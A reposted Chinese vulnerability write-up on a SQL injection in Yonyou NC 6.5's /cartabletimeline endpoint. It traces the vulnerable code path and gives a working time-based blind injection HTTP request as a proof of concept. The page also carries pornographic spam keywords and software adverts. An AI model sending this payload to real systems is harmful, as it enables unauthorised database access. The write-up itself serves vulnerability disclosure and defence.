喵绅,亚洲性情,国产欧美日韩一区二区刘玥

用友NC 漏洞分析--cartabletimeline存在SQL注入

當前位置：點晴教程→知識管理交流 →『技術文檔交流』

admin

2025年4月9日 0:6 本文熱度 153

引

言

用友NC是一款大型erp企業(yè)管理系統(tǒng)與電子商務平臺；用友網(wǎng)絡科技股份有限公司用友NC存在SQL注入漏洞，攻擊者可利用該漏洞獲取數(shù)據(jù)庫敏感信息。

漏洞描述

用友NC是一款大型erp企業(yè)管理系統(tǒng)與電子商務平臺。用友網(wǎng)絡科技股份有限公司用友NC存在SQL注入漏洞，攻擊者可利用該漏洞獲取數(shù)據(jù)庫敏感信息。影響版本如下

用友NC6.5漏洞分析

VsmAction類中此處存在@Servlet注解，也就是說當訪問路徑為/cartabletimeline會直接定位到這里。

跟進getVehicleApplyInfo方法接口類ICarTalbeService，定義了getVehicleApplyInfo方法

找到接口類ICarTalbeService的實現(xiàn)類CarTableServiceImpl

跟進getgetUserVehicleApplyInfo方法

跟進queryVOs方法

漏洞復現(xiàn)（自測）

GET /portal/pt/cartabletimeline/doList?pageId=login&mtr=1)WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: x.x.x.x:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: JSESSIONID=778E1EE003971592F31449220834A1AE.server
Priority: u=4

本文已2024-11-27

發(fā)布qax攻防社區(qū)：https://forum.butian.net/article/627

所以本文只做簡寫，可查看原文

閱讀原文：原文鏈接

該文章在 2025/4/9 12:03:36 編輯過

點晴ERP是一款針對中小制造業(yè)的專業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國內大量中小企業(yè)的青睞。

點晴PMS碼頭管理系統(tǒng)主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業(yè)務管理，結合碼頭的業(yè)務特點，圍繞調度、堆場作業(yè)而開發(fā)的。集技術的先進性、管理的有效性于一體，是物流碼頭及其他港口類企業(yè)的高效ERP管理信息系統(tǒng)。

點晴WMS倉儲管理系統(tǒng)提供了貨物產(chǎn)品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產(chǎn)管理,WMS管理系統(tǒng),標簽打印,條形碼,二維碼管理,批號管理軟件。

點晴免費OA是一款軟件和通用服務都免費，不限功能、不限時間、不限用戶的免費OA協(xié)同辦公管理系統(tǒng)。

狠狠色丁香婷婷综合尤物/久久精品综合一区二区三区/中国有色金属学报/国产日韩欧美在线观看 - 国产一区二区三区四区五区tv

用友NC 漏洞分析--cartabletimeline存在SQL注入

用友NC6.5漏洞分析

漏洞復現(xiàn)（自測）